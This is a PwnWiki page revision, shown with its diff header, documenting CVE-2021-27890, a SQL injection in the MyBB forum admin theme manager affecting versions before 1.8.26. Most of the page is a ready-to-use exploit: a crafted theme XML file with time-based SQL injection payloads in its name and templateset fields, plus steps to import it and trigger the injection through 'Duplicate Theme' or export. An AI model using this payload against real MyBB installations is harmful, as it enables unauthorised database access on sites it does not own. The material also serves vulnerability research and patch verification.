Difference between revisions of "CVE-2021-27890 MyBB後台論壇主題管理SQL注入漏洞/en"

From PwnWiki
(Created page with "==Affected Versions==")
 
(Created page with "Click "Duplicate Theme", then capture the traffic, successfully implemented delayed injection (the injection will also exist in the export function)")
 
Line 31: Line 31:
 
</pre>
 
</pre>
  
<div lang="chinese" dir="ltr" class="mw-content-ltr">
+
Click "Duplicate Theme", then capture the traffic, successfully implemented delayed injection (the injection will also exist in the export function)
點擊Duplicate Theme,抓包,成功延时注入(導出主題也會存在該注入)
 
</div>
 

Latest revision as of 14:18, 31 May 2021

Other languages:

Affected Versions

< 1.8.26


Exploit

Import the constructed malicious xml in the backend theme manager

<?xml version="1.0" encoding="UTF-8"?>
<theme name="1' and sleep(10) and '" version="1825">
<properties>
<templateset>-2' or sleep(0.01) or '</templateset>
<editortheme><![CDATA[mybb.css]]></editortheme>
<imgdir><![CDATA[images]]></imgdir>
<logo><![CDATA[images/logo.png]]></logo>
<tablespace><![CDATA[5]]></tablespace>
<borderwidth><![CDATA[0]]></borderwidth>
<color><![CDATA[]]></color>
<disporder><![CDATA[a:7:{s:10:"global.css";i:1;s:10:"usercp.css";i:2;s:9:"modcp.css";i:3;s:16:"star_ratings.css";i:4;s:14:"showthread.css";i:5;s:17:"thread_status.css";i:6;s:8:"css3.css";i:7;}]]></disporder>
</properties>
<stylesheets>
</stylesheets>
<templates>
</templates>
</theme>

Click "Duplicate Theme", then capture the traffic, successfully implemented delayed injection (the injection will also exist in the export function)